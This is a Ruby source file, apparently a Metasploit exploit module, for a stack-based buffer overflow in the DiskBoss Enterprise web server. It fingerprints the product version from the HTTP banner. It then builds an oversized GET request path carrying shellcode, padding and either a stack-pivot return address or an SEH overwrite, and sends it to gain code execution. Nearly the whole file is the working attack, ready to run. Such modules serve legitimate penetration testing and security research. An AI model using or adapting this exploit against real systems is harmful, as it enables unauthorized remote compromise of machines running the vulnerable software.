Path: blob/master/modules/exploits/windows/http/diskboss_get_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the DiskBoss Enterprise built-in web server.
#
# The overflow is triggered by an over-long request path in an HTTP GET
# (see 'Description' below). Two exploitation techniques are used depending
# on the detected version: a stack-pivot return address for v7.4.28/v7.5.12
# and an SEH overwrite for v8.2.14. Version detection relies on the product
# banner returned for GET /.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # Seh provides generate_seh_record; HttpClient provides send_request_cgi.
  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata: affected versions, per-target offsets and
  # return addresses, payload constraints and references.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'DiskBoss Enterprise GET Buffer Overflow',
        'Description' => %q{
          This module exploits a stack-based buffer overflow vulnerability
          in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,
          caused by improper bounds checking of the request path in HTTP GET
          requests sent to the built-in web server. This module has been
          tested successfully on Windows XP SP3 and Windows 7 SP1.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'vportal', # Vulnerability discovery and PoC
          'Ahmad Mahfouz', # Vulnerability discovery and PoC
          'Gabor Seljan', # Metasploit module
          'Jacob Robles' # Metasploit module
        ],
        'References' => [
          ['EDB', '40869'],
          ['EDB', '42395']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Platform' => 'win',
        'Payload' => {
          # Bytes that terminate or alter the request path in the HTTP parser
          # (NUL, tab, CR, LF, space) must not appear in the encoded payload.
          'BadChars' => "\x00\x09\x0a\x0d\x20",
          # 2000 is below every target 'Offset', so the padding computed in
          # #exploit ('Offset' - payload length) never goes negative.
          'Space' => 2000
        },
        'Targets' => [
          [
            'Automatic Targeting',
            {
              # Selected by default; #exploit resolves it to targets[1..3]
              # from the server banner.
              'auto' => true
            }
          ],
          [
            'DiskBoss Enterprise v7.4.28',
            {
              'Offset' => 2471,
              'Ret' => 0x1004605c # ADD ESP,0x68 # RETN [libpal.dll]
            }
          ],
          [
            'DiskBoss Enterprise v7.5.12',
            {
              'Offset' => 2471,
              'Ret' => 0x100461da # ADD ESP,0x68 # RETN [libpal.dll]
            }
          ],
          [
            'DiskBoss Enterprise v8.2.14',
            {
              'Offset' => 2496,
              'Ret' => 0x1002A8CA # SEH : # POP EDI # POP ESI # RET 04 [libpal.dll]
            }
          ]
        ],
        'Privileged' => true,
        'DisclosureDate' => '2016-12-05',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Fingerprints the service from the banner in the GET / response body.
  #
  # @return [Exploit::CheckCode]
  #   Vulnerable when the banner names one of the three affected versions,
  #   Detected when it names DiskBoss Enterprise at another version,
  #   Unknown when no HTTP 200 response was obtained, Safe otherwise.
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/'
    )

    if res && res.code == 200
      if res.body =~ /DiskBoss Enterprise v(7\.4\.28|7\.5\.12|8\.2\.14)/
        return Exploit::CheckCode::Vulnerable
      elsif res.body =~ /DiskBoss Enterprise/
        return Exploit::CheckCode::Detected
      end
    else
      # Reached for a missing response and for any non-200 status alike;
      # the message only mentions the timeout case.
      vprint_error('Unable to determine due to a HTTP connection timeout')
      return Exploit::CheckCode::Unknown
    end

    # HTTP 200 with a body that does not mention DiskBoss Enterprise.
    Exploit::CheckCode::Safe
  end

  # Resolves the target (by banner when 'Automatic Targeting' is selected),
  # builds the oversized request path for that target and sends it as the
  # URI of a single GET request.
  #
  # @raise [Msf::Exploit::Failed] via fail_with(Failure::NoTarget) when the
  #   banner matches no known version or the selected target has no
  #   matching buffer layout
  def exploit
    mytarget = target

    if target['auto']
      mytarget = nil

      print_status('Automatically detecting the target...')

      res = send_request_cgi(
        'method' => 'GET',
        'uri' => '/'
      )

      # Map the exact version string in the banner to the matching entry
      # of 'Targets'; anything else leaves mytarget nil.
      if res && res.code == 200
        if res.body =~ /DiskBoss Enterprise v7\.4\.28/
          mytarget = targets[1]
        elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/
          mytarget = targets[2]
        elsif res.body =~ /DiskBoss Enterprise v8\.2\.14/
          mytarget = targets[3]
        end
      end

      if !mytarget
        fail_with(Failure::NoTarget, 'No matching target')
      end

      print_status("Selected Target: #{mytarget.name}")
    end

    # The buffer layout depends on the target: the two 7.x targets place the
    # return address at 'Offset' from the start of the path, the 8.2.14 target
    # places an SEH record there. Statement order determines the byte layout.
    case mytarget
    when targets[1], targets[2]
      sploit = make_nops(21)
      sploit << payload.encoded
      # Pad up to 'Offset' so the next four bytes land on the return address.
      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
      sploit << [mytarget.ret].pack('V')
      sploit << rand_text_alpha(2500)
    when targets[3]
      seh = generate_seh_record(mytarget.ret)
      sploit = payload.encoded
      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
      # Overwrite in place at 'Offset' rather than append.
      sploit[sploit.length, seh.length] = seh
      sploit << make_nops(10)
      sploit << Rex::Arch::X86.jmp(0xffffbf25) # JMP to ShellCode
      # Fill to a fixed total length of 5000 bytes.
      sploit << rand_text_alpha(5000 - sploit.length)
    else
      fail_with(Failure::NoTarget, 'No matching target')
    end

    # The whole crafted buffer is the request path of the GET.
    send_request_cgi(
      'method' => 'GET',
      'uri' => sploit
    )
  end
end